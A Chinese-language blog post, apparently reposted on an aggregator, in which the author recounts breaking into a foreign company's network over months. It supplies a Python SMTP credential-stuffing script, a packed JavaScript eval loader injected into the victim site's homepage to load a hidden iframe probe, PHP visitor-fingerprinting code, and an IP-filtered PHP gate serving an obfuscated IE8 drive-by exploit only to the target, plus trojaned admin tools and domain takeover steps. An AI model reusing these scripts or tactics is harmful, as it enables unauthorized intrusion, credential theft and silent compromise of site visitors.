(原創)對某國的一次滲透

文章均由自己原創,只是一直沒有在自己博客發表。本地附件也沒有了,我是從網上找來我的以前的投稿。

寫在之前的廢話:小菜技術能力不行,如果你覺得此文實在看不下去,還請PASS掉。如果你對我的文章有興趣,可以與我一起交流。文章因為敏感無圖,業內人士看看自然懂。

由于XXX耗時長,需要的支持多,而且目標敏感。在這里,我們不便介紹目標背景,也不多說其他的,直接來進入主題。

某國某目標,我盯了它大概半年。嗯,終于有一天,我覺得時機成熟,下手吧。

在滲透目標的前期,我們需要了解對方公司的安全意識。以及需要搜集所有網站的IP,公司的出口,以及公司網段所存在的B-C段,公司人員郵箱,公司人員愛好,facebook等信息。

首先,我把目標公司的WEB都給搜集好了,大公司一般C段都是在一起的。而我有個習慣,在滲透目標的時候,先喜歡把OWA的段找出來掃一下。這樣大概的就知道了公司的架構情況。而很多時候,大公司都是會把WEB段給區分的,哪幾個外網IP段是管理WEB的,哪幾個段是放數據庫的。不過隨著網絡越趨復雜,就算拿到了WEB?也就是在DMZ徘徊。不過只要拿到了WEB就好說了。Go把。

千辛萬苦拿下來了這個公司的一個WEB,WEB如何拿下來咱們不多說。不是重點。當我分析內網情況的時候,環境就是在DMZ,system權限。通過判斷協議,TCP?HTTP都沒問題。于是,我把DMZ?WEB給中了一個馬,這樣更容易操作,至少得到了一個交互式的shell。先把遠控拋開不說,通過netstat?-ano分析。WEB服務器連上了在內部的一臺數據庫服務器。于是我找到了WEB服務器的web.config腳本,成功得到了數據庫賬戶密碼,但是數據庫賬戶權限非SA,而且SQL?SERVER版本是2008(悲劇,MSSQL?2000的話直接就遠程溢出了).沒辦法,就算我們導了個shell,又有何用?不著急,慢慢分析,于是我試著去ping內網數據庫機器,PING不通,接著我在拿S掃描器開了很小的線程,掃了掃WEB連接的數據庫那臺機器。和我猜想的結果是一樣,這種情況我不是第一次碰到了。就只有個1433能夠過去。這時,我猜想大概的內網架構是這樣的:

WEB–>防火墻–>數據庫服務器–>內網(而當我搞下來,發現情況并不是這樣的)

算了,沒辦法。先不管了,連上數據庫,分析數據,看能否去撞號,登OWA或者郵箱之類的。

于是寫了個PYTHON腳本,去跑他們的OWA(這個腳本是N年前寫的,可能不太符合,大家去改改就好了。原理差不多):

?

import?smtplib?,sys?,timedef?main():server?=?"smtp.live.com"?#gmail?smtp.gmail.com,?yahoo?smtp.mail.yahoo.comfp?=?open("D:\python\\hotmail.txt")fp1?=?open("d:\python\\save.txt",?'a+')while?1:line?=?fp.readline()uandp?=?line.split('?')name?=?uandp[0]name?=?name.split('@')[0]pwd?=?uandp[1]pwd?=?pwd.split("\n")[0]try:smtp?=?smtplib.SMTP_SSL(server,465)??#?gmail?465except:print?"[*]Connect?Error."sys.exit(0)passtry:#smtp.set_debuglevel(1)#smtp.ehlo()#smtp.starttls()smtp.ehlo()smtp.login(name,pwd)except:print?"[-]:%s:%s"?%?(name,?pwd)pass#time.sleep(1)else:out?=?"[+]:%s:%s\n"?%?(name,?pwd)print?outfp1.write(out)fp1.flush()smtp.quit()smtp.close()fp.close()fp1.close()if?__name__=="__main__":main()

?

分析完數據,把數據庫中的目標人物郵箱都給挑選出來。跑完。手工測試VPN,都失敗了。沒辦法,繼續另尋其他的路子。

來回到遠控,通過分析,本機WEB有一個員工登錄的地方,但是是.NET的。不能改代碼。因為如果改寫代碼,需要重新編譯(這里可能我說的有錯。)但是有一個員工登錄的地方我們就已經足夠了,這里也先不管它。先分析再說。

我的遠控是可以切換用戶的,只要有用戶在,可以切換到對方的用戶下。首先分析了本地管理組的用戶,抓密碼。Query?user?發現有幾個用戶在線。于是我切換到每個用戶,主要就是查看IPC?。功夫不負有心人,當我切換到B的會話下的時候,NET?USE看了看。大家猜我看到了啥?(可能你會想,咱們不是在DMZ嗎?會話咋來的??管理員從內網連過來。)

?

C:\ProgramData>net useNew connections will be remembered.Status       Local     Remote                    Network-------------------------------------------------------------------------------\\TSCLIENT\C              Microsoft Terminal Services\\TSCLIENT\D              Microsoft Terminal Services\\TSCLIENT\E              Microsoft Terminal Services\\TSCLIENT\F              Microsoft Terminal ServicesThe command completed successfully.

?

?

沒錯,管理員從內網連接過來,把盤給帶過來了。這下有得玩了。于是我分析了連接過來的那個盤。通過netstat?-ano?知道了帶過盤來的那機器的IP。趕緊分析,知道了對方是管理員,在OWA的MAILBOX服務器上鏈接過來的。搞的多的就知道,MAILBOX是沒WEB的,當然也有。MAILBOX主要的作用就是來存儲MAIL的郵件數據。于是我CURL,S掃描了服務器的那個段。一樣的,我DMZ怎么都過不去,而且對方常用端口也沒開。如果開了,咱們直接復制個shell就過去,本地借用內網那臺服務器執行命令就可以了。但是環境不允許我們這么容易就進入別人內網,扭轉了幾天,還是沒辦法,當我最后分析到另外一個盤符的時候,我竟然看到了IT服務器的一個盤,里面有IT部門的一部分密碼。趕緊下載分析。這樣,基本上我判斷,域管可能在里面。于是我來到VPN,一個一個測試,竟然都失敗了。心想:FUCK,肯定這個是一個小域,沒有VPN可以有權限登錄。然后在一個一個來測試OWA,竟然登錄進去了一個。分析所有郵件,搜索關鍵字:PASSWORD?FTP?RDP?SERVER,HACKER。等字眼。沒有所獲,就看到一封說近期有人在搞他們公司,需要加強安全防范的郵件(當然不是我。)。可能這時候很多人想:發郵件,綁馬??如果說你有0DAY或者免殺好的NDAY可以這樣做。不然就是找死了。

這個時候,我還是信心滿滿的,不是有IT部門的盤嗎??嘿嘿,下載了幾個常用的工具,比如VPN,補丁。綁馬了,在傳上去。還給CMD綁了個馬,放到了MAILBOX的c:\users\**\desktop

把每個用戶桌面上都放了一個CMD.EXE。就不相信管理員不運行。

等啊等啊,等了差不多半個月。沒任何反映,決定還是自己出手。不然就被動,連WEB掉了都不好了。

從網上找代碼,自己改寫了一個PHP,在WEB服務器上掛了一個探針。這里有個小知識:WEB服務器不是http協議的,而是https來進行訪問的,所以我們需要找一個https的網站(綠標的那種),不然你是探針不到任何信息的。說做就做,HTTPS綠標的網站我多的是,而PHP代碼簡單,改寫代碼如下:

?

function getBrowse() { global $_SERVER; $Agent = $_SERVER['HTTP_USER_AGENT']; $browser = ''; $browserver = ''; $Browser = array('Lynx', 'MOSAIC', 'AOL', 'Opera', 'JAVA', 'MacWeb', 'WebExplorer', 'OmniWeb'); for($i = 0; $i <= 7; $i ++){ if(strpos($Agent, $Browsers[$i])){ $browser = $Browsers[$i]; $browserver = ''; } } if(ereg('Mozilla', $Agent) && ereg('Maxthon', $Agent)){ $temp = explode('Maxthon/', $Agent); $Part = $temp[1]; $temp = explode(' ', $Part); $browserver = $temp[0]; $browser = 'Maxthon'; } if(ereg('Mozilla', $Agent) && ereg('Chrome', $Agent) && !ereg('Maxthon', $Agent)){ $temp = explode('Chrome/', $Agent); $Part = $temp[1]; $temp = explode(' ', $Part); $browserver = $temp[0]; $browser = 'Chrome'; } if(ereg('Mozilla', $Agent) && ereg('Opera', $Agent)) { $temp = explode('(', $Agent); $Part = $temp[1]; $temp = explode(')', $Part); $browserver = $temp[1]; $temp = explode(' ', $browserver); $browserver = $temp[2]; $browserver = preg_replace('/([d.]+)/', '\1', $browserver); $browserver = $browserver; $browser = 'Opera'; } if(ereg('Mozilla', $Agent) && ereg('MSIE', $Agent)){ $temp = explode('(', $Agent); $Part = $temp[1]; $temp = explode(';', $Part); $Part = $temp[1]; $temp = explode(' ', $Part); $browserver = $temp[2]; $browserver = preg_replace('/([d.]+)/','\1',$browserver); $browserver = $browserver; $browser = 'Internet Explorer'; } if($browser != ''){ $browseinfo = $browser.' '.$browserver; } else { $browseinfo = 'Unknow Browser'; } return $browseinfo; } function getIP() {return isset($_SERVER["HTTP_X_FORWARDED_FOR"])?$_SERVER["HTTP_X_FORWARDED_FOR"]:(isset($_SERVER["HTTP_CLIENT_IP"])?$_SERVER["HTTP_CLIENT_IP"]:$_SERVER["REMOTE_ADDR"]);}function getOS () { global $_SERVER; $agent = $_SERVER['HTTP_USER_AGENT']; $os = false; if (eregi('win', $agent) && strpos($agent, '95')){ $os = 'Windows 95'; } else if (eregi('win 9x', $agent) && strpos($agent, '4.90')){ $os = 'Windows ME'; } else if (eregi('win', $agent) && ereg('98', $agent)){ $os = 'Windows 98'; } else if (eregi('win', $agent) && eregi('nt 6.1', $agent)){ $os = 'Windows 7'; }else if (eregi('win', $agent) && eregi('nt 6', $agent)){ $os = 'Windows Vista'; }  else if (eregi('win', $agent) && eregi('nt 5.1', $agent)){ $os = 'Windows XP'; } else if (eregi('win', $agent) && eregi('nt 5', $agent)){ $os = 'Windows 2000'; } else if (eregi('win', $agent) && eregi('nt', $agent)){ $os = 'Windows NT'; } else if (eregi('win', $agent) && ereg('32', $agent)){ $os = 'Windows 32'; } else if (eregi('linux', $agent)){ $os = 'Linux'; } else if (eregi('unix', $agent)){ $os = 'Unix'; } else if (eregi('sun', $agent) && eregi('os', $agent)){ $os = 'SunOS'; } else if (eregi('ibm', $agent) && eregi('os', $agent)){ $os = 'IBM OS/2'; } else if (eregi('Mac', $agent) && eregi('PC', $agent)){ $os = 'Macintosh'; } else if (eregi('PowerPC', $agent)){ $os = 'PowerPC'; } else if (eregi('AIX', $agent)){ $os = 'AIX'; } else if (eregi('HPUX', $agent)){ $os = 'HPUX'; } else if (eregi('NetBSD', $agent)){ $os = 'NetBSD'; } else if (eregi('BSD', $agent)){ $os = 'BSD'; } else if (ereg('OSF1', $agent)){ $os = 'OSF1'; } else if (ereg('IRIX', $agent)){ $os = 'IRIX'; } else if (eregi('FreeBSD', $agent)){ $os = 'FreeBSD'; } else if (eregi('teleport', $agent)){ $os = 'teleport'; } else if (eregi('flashget', $agent)){ $os = 'flashget'; } else if (eregi('webzip', $agent)){ $os = 'webzip'; } else if (eregi('offline', $agent)){ $os = 'offline'; } else { $os = 'Unknown'; } return $os; }

這里貼的PHP代碼并非完整的,大家可以自己去改寫。

腳本的功能是獲取來源IP,OS,瀏覽器版本等等。當然如果你覺得還少,你可以加入探針JAVA,FLASH的一些功能。這里不在多說。

于是來到WEB主站,查看主頁調用的JS。在JS里插入一段混淆代碼。

?

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('5.6("<1 4=\\"2://3//9.a\\" 7=0 8=0></1>");',11,11,'|iframe|https|xxx|src|document|write|height|width|Ie|php'.split('|'),0,{}))

而原型如下:

document.write("<iframe src=\"https://xxx//Ie.php\" height=0 width=0></iframe>");

接下來我們要做的就是分析來源IP,等待了幾天以后。我查看了探針的地址。記錄了不少IP.但是那么多IP應該如何來確定哪個是他們的出口IP呢?

沒辦法,偷懶把,寫了個PYTHON腳本:

#!/usr/bin/env python#-*- coding:utf-8 -*-import sysimport threadingimport httplibimport reimport timeclass Myclass(threading.Thread):def __init__(self,host,path):threading.Thread.__init__(self)self.host = hostself.path = pathself.result = []def run(self):if "https://" in self.host:conn = httplib.HTTPSConnection(self.host,80,None,None,False,10)else:conn = httplib.HTTPConnection(self.host,80,False,10)i_headers = {"User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-Us; rv:1.9.1) Gecko/20090624 Firefox/3.5","Accept": "text/plain"}conn.request('GET',self.path,headers = i_headers)r1 = conn.getresponse()text = r1.read()text1 = text.lstrip()#size = text.count("\n")test = open('ip.txt','a+')test.write(text1)b = open("ip.txt",'r')c = open("ids.txt",'w')for line in b.readlines():m = re.search(r'(IP:\d*.\w*.\d*.\d*.\d*)',line)        mm =  m.group(0)owa = mm.replace("IP:","").strip().replace("\n","")self.result =  owa.replace("\n","")c.write(self.result)c.write("\n")#print "write success"g = open("ids.txt",'r')for lines in g.readlines():getsip =  lines.replace("\n","")try:conns = httplib.HTTPConnection("bgp.he.net",80,False,10)except Exception:print "[-]:connection out time"breakelse:conns.request('GET','/ip/%s' % getsip,headers = i_headers)r2 = conns.getresponse()texts = r2.read()try:line_split = re.search(r'(<u>.*\d+\D+.*.title=)',texts)obj =  line_split.group(0)print "server:",obj.replace("<u>","").replace("</u>","").replace("\n","").replace("(<a href=\"","search domain:").replace("\" title=","").replace("/dns/","")except Exception, e:passtime.sleep(5)#print line_splitdef main():if len(sys.argv) < 3:print "[*]:Usage python info.py 127.0.0.1 /path"sys.exit(1)Mythread = Myclass(sys.argv[1],str(sys.argv[2]))Mythread.start()if __name__ == "__main__":main()

?

這個腳本的功能是先把目標網站記錄的IP地址全部給讀取下來,在本地保存為TXT,在循環依次讀取一個IP,來到接口bgp.he.net?這個接口查詢。至于如何分辨公司出口IP,不在多說了。看IP信息以及訪問源就知道了。

成功獲取到對方公司的出口IP,接下來就好辦了。知道對方用的瀏覽器版本,OS,等等。

于是先決定先測試ie8的漏洞,網上找了個IE8的漏洞。本地WIN7?XP測試沒問題(因為對方公司還是有人在用IE8,win7默認就是IE8)。但是網上找的IE8的漏洞都是被殺的不行的,于是心想,自己做把。

于是網上找了一個BASE64?JS解密腳本,把IE8的網馬內寫了幾個函數,把核心代碼都給放到函數里。然后直接把函數內都給BASE64加密了。OK,很簡單把,不殺了。

但是我們在掛馬的時候,并不是瞎掛。而是必須有針對性的掛,不然你掛上,殺毒軟件一下把你樣本給抓走了。改天又出這報告又出那報告的。多丟人。那就得需要一個定向掛馬的腳本了。因為對方的HTTPS的,我VPS上沒裝HTTPS的證書,心想,直接就通過WEBSHELL把這串代碼放到綠標的HTTPS網站上就好了。

定向掛馬腳本如下:

?

function check_ip(){$ALLOWED_IP=array('192.168.2.*','目標公司出口IP');$IP=getIP();$check_ip_arr= explode('.',$IP);if(!in_array($IP,$ALLOWED_IP)) {foreach ($ALLOWED_IP as $val){if(strpos($val,'*')!==false){$arr=array();$arr=explode('.', $val);$bl=true;for($i=0;$i<4;$i++){if($arr[$i]!='*'){if($arr[$i]!=$check_ip_arr[$i]){$bl=false;break;}}}if($bl){return;die;}}}header('HTTP/1.1 403 Forbidden');exit();die;} else{}

腳本的else后頭,就是調用的那個網馬了。

我把這個腳本和IE網馬都給放到了綠標的網站上,于是重新在目標網站上,把探針去了。加入咱們的PHP腳本地址,遠程調用。接下來要做的事情就是等著把。

誰沒成想:剛掛上沒5分鐘,目標公司人中了我的網馬,上線了。擦噢,這人品,不是一般的好。

趕緊把代碼給取了。做內網滲透去了。而當我們到達內網的時候,內網情況卻是這樣的

DMZ-> WAF-> mailbox(我來到了這臺服務器上)-> IDS/IPS-> 另外的域-> 主域

媽的額,好麻煩。沒辦法啦。之前拿下來了IT的管理密碼的清單,先把當前域搞下來再說。毫無懸念的,直接連上了當前的域,控制了OWA?SERVER。擦屁股走人,遠控上操作去了。

雖然拿下來了這個域,但是這個域內就那么幾十臺個人機,而目標公司是幾萬人,看樣子這個是他們的一個分的部門。只有繼續深入了。

接下來我們要找的就是其余域的其他網段了,我ping了下目標公司的主站www.xxoo.com,嗯,內網IP地址是10.xx.xx.xx,嗯,雖然能夠PING通,但是IPC這些都是不行的。接下來要做的就是打入其他域,搞定其他域,慢慢深入。

于是把目標個公司所有域名全部給搜集起來,在內網一個一個ping,把返回是內網的IP地址都給記錄下來。

然后把朋友寫的掃描器,指定線程,上去掃常用的WEB框架,數據庫之類的東西。

預知后事如何,還請聽下回分解。謝謝。

目前主域已經搞下來了,但是無奈沒域管,好不容易抓到。但是被BIT9發現我了,把我又T出來了。還是得慢慢來,不著急,慢慢分析把。下回且聽分析如何繞過防范不嚴的BIT9。

很多人看了文章可能會覺得我說的太籠統了,倒是。我不可能那么詳細的說出來一些東西,但是如果你能夠在這個文章里學習到新的思路,那就是我寫這個文章的目的。

?

轉載于:https://www.cnblogs.com/killbit/p/4850250.html

本文來自互聯網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。
如若轉載,請注明出處:http://www.pswp.cn/news/256647.shtml
繁體地址,請注明出處:http://hk.pswp.cn/news/256647.shtml
英文地址,請注明出處:http://en.pswp.cn/news/256647.shtml

如若內容造成侵權/違法違規/事實不符,請聯系多彩編程網進行投訴反饋email:809451989@qq.com,一經查實,立即刪除!

相關文章

matlab常用函數——方程函數

八、插值函數、線性方程解函數和多項式函數 1)插值函數 interp1q :1維快速線性插值法 yi=interp1q(x,Y,xi) interp1q正常執行條件: (1)x單調遞增列向量 (2)Y為列向量or行數為length(x)(3)xi為列向量,如果xi值在x的坐標范圍外,返回NaN 實例: x=(-5:0.5:5); y=sin…

C/C++ | 字節對齊

目的:優化CPU訪問數據效率 類型轉換:未對齊時,嚴格一些的系統會報段錯誤,未報錯的話效率也會有所下降。 各種結構的對齊: 編譯器的區別: 其實字節對齊的細節和具體編譯器實現相關,但一般而言&am…

關于python測試webservice接口的視頻分享

現在大公司非常流行用python做產品的測試框架,還有對于一些快速原型產品的開發也好,很好地支持OO編程,代碼易讀。 Python的更新挺快的,尤其是第三方庫。 對于測試人員,代碼基礎薄弱,用python語言容易上手。…

matlab常用函數——文件操作函數

十一、基本文件操作函數 1)文件創建函數 filemaker :把文件名與文件中函數名分開 。 filesep :文件目錄分隔。 fileparts :把目標文件名拆分成字符串形式輸出 。 tempdir :返回系統暫存地址名 。 tempname :返回系統暫存文件名 。 fullfile :創建文件名 2)文件打…

Struts2中文件上傳下載實例

1.單文件上傳 1 jsp頁面&#xff1a;2 3 <!-- 單文件上傳 -->4 <form action"Fileupload.action" method"post"5 enctype"multipart/form-data">6 username:7 <input type"tex…

最優化課堂筆記06-無約束多維非線性規劃方法(續)

6.5共軛方向法 6.5.1 共軛方向 6.5.1 共軛梯度法 6.6單純形法(不考) 6.7最小二乘法 6.7.2 改進的高斯-牛頓最小二乘法

opengl微發展理解

1.什么是OpenGL? 一種程序&#xff0c;可以與界面和圖形硬件交互作用、一個開放的標準 2.軟件管道 請看上圖 - Apllication層 表示你的程序&#xff08;調用渲染命令。如opengl API&#xff09; -Abstraction層 表示畫圖接口&#xff08;如OpenGL API或者DirectX API&a…

MacosX 下GCC編譯指定版本的代碼

export MACOSX_DEPLOYMENT_TARGET10.6轉載于:https://www.cnblogs.com/lovelylife/p/5754226.html

最優化作業第六章——共軛梯度法和鮑爾法

共軛梯度法&#xff1a; 代碼&#xff1a; #導入模塊 from sympy import * import sympy as sp #將導入的模塊重新定義一個名字以便后續的程序進行使用 from numpy import * import numpy as npdef main():#本例是利用共軛梯度法進行最優化x1,x2,alpha symbols("x1,x2,…

酒鬼隨機漫步(一個矢量類)

摘要: 閱讀全文這是一個定義的一個矢量類&#xff0c; 然后用矢量類模擬一個酒鬼的隨機漫步 問題很簡單&#xff0c; 實現也不麻煩&#xff0c; 但是這個小程序卻可以呈現出許多語法知識。而且代碼風格也不錯&#xff0c;因此保存在了這篇博客中。 建議&#xff1a; 1. 類的聲…

對高并發流量控制的一點思考

前言 在實際項目中&#xff0c;曾經遭遇過線上5WQPS的峰值&#xff0c;也在壓測狀態下經歷過10WQPS的大流量請求&#xff0c;本篇博客的話題主要就是自己對高并發流量控制的一點思考。 應對大流量的一些思路 首先&#xff0c;我們來說一下什么是大流量&#xff1f; 大流量&…

ndk學習19: 使用Eclipse調試so

1. 設置調試選項在AndroidManifest文件加入允許調試android:debuggable"true" 此時編譯項目會多出:2. 配置調試代碼把需要調試的代碼,放如按鈕事件中,如果放在OnCreate會導致連接調試器時,代碼已經跑完了Button btnTest (Button)findViewById(R.id.button1);btnT…

Inside the C++ Object Model | Outline

《Inside the C Object Model&#xff08;C對象模型&#xff09;》&#xff0c;這是一本灰常不錯的書&#xff01; CSDN下載頁面&#xff08;中文&#xff0c;侯捷譯&#xff09; 豆瓣評論 讀書筆記目錄如下&#xff08;不定時更新&#xff09;&#xff1a; 轉載于:https://www…

最優化課程筆記07——約束問題的非線性規劃方法(重點:拉格朗日乘子法和懲罰函數法)

7.1 間接法&#xff1a;約束轉化為無約束問題&#xff08;含一個重點&#xff1a;拉格朗日乘子法&#xff09; 當維數多的時候不適用 7.1.2拉格朗日乘子法&#xff08;重點&#xff09; 7.1.2.1 等式約束問題 7.1.2.2 不等式約束問題 7.1.3 懲罰函數法&#xff08;內懲罰函數法…

工業相機:傳感器尺寸與像元尺寸的關系

相同分辨率的工業相機&#xff0c;傳感器面積越大&#xff0c;則其單位像素的面積也越大&#xff0c;成像質量也會越好。同樣的500萬像素的工業相機&#xff0c;2/3”的傳感器成像質量就要優于1/2”的。一般來說&#xff0c;工業相機的靶面大小&#xff0c;如果要求不是太嚴格&…

macOS下安裝ipython

macOS下sudo安裝ipython&#xff0c;會提示限錯誤&#xff1a; [Errno 1] Operation not permitted: /tmp/pip-Elrhse-uninstall/System/Library... 解決方法&#xff1a; pip install ipython --user -U 參考&#xff1a; http://chaishiwei.com/blog/994.html 本文轉自 h2app…

結構化查詢語言包含哪些方面?

結構化查詢語言SQL&#xff08;STRUCTURED QUERY LANGUAGE&#xff09;是最重要的關系數據庫操作語言&#xff0c;并且它的影響已經超出數據庫領域&#xff0c;得到其他領域的重視和采用&#xff0c;如人工智能領域的數據檢索&#xff0c;第四代軟件開發工具中嵌入SQL的語言等。…

Opencv 找輪廓并畫出相應的矩形

找輪廓參考以下大神的&#xff0c;對于里面的方法和結果存儲解釋的很清楚&#xff1b; http://blog.csdn.net/gubenpeiyuan/article/details/44922413 缺少的是畫相應包圍矩形的&#xff0c;其中找矩形用最小外接矩形函數cvMinAreaRect2 。 CvBox2D rect; CvPoint2D32f Corner…

C# 圖片識別(支持21種語言)

圖片識別的技術到幾天已經很成熟了&#xff0c;只是相關的資料很少&#xff0c;為了方便在此匯總一下&#xff08;C#實現&#xff09;&#xff0c;方便需要的朋友查閱&#xff0c;也給自己做個記號。 圖片識別的用途&#xff1a;很多人用它去破解網站的驗證碼&#xff0c;用于達…